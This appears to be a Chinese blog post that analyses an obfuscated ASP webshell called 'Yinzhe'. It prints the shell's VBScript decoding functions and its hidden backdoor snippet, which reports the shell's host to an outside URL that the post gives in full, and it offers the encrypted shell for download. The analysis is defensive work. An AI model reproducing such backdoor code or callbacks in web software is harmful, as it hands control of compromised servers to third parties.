• 欢迎访问金刀客博客!
  • 2024,春节快乐!

解密的隐者webshell及后门简单分析

原创天空 admin 7910次浏览 已收录 0个评论

vbscript.encode解密后代码的自定义加密全是用汉字“隐者”来加密的就叫这个shell为隐者webshell了,
先上图看真容


一个感觉是这个shell解密很漂亮,还是挺顺眼的。
解密首先是反编windows script encode了,之后得到自定义解密,都很简单,不多说了。
加密方式有2个
十三的加密

Function ShiSanFun(ShiSanObjstr)
ShiSanObjstr = Replace(ShiSanObjstr, “者”, “”””):For ShiSanI = 1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr, ShiSanI, 1) <> “隐” Then
ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
Else:ShiSanNewStr = vbCrLf & ShiSanNewStr
End If:Next:ShiSanFun = ShiSanNewStr:End Function

黑客伟的加密

Function UZSS(objstr)
objstr = Replace(objstr, “隐”, “”””):For i = 1 To Len(objstr):If Mid(objstr, i, 1) <> “者” Then
NewStr = Mid(objstr, i, 1) & NewStr
Else
NewStr = vbCrLf & NewStr
End If:Next:UZSS = NewStr:End Function

都分别解密之。
下面看下后门,和以前的后门方式一样

if Instr(Serveru,”127.0.0.1″)<>0 or Instr(Serveru,”192.168.”)<>0 or Instr(Serveru,””&posurl&”://”)<>0 then
else:if session(“servec”)=1 then
session(“servec”)=session(“servec”)+1
RRS”


else
if Action<>“” then session(“servec”)=session(“servec”)+1
end if
end if
end if

在本地测试,后门地址解开是:http://188dl.com/k/y.asp?u=localhost/test.asp&p=1
附件中为加密版本
点击下载此文件
最开始出于共享的目的,发布了解密的源码,但是很多朋友劝说我,那么解密文件就不发布了。


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明解密的隐者webshell及后门简单分析
喜欢 (4)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到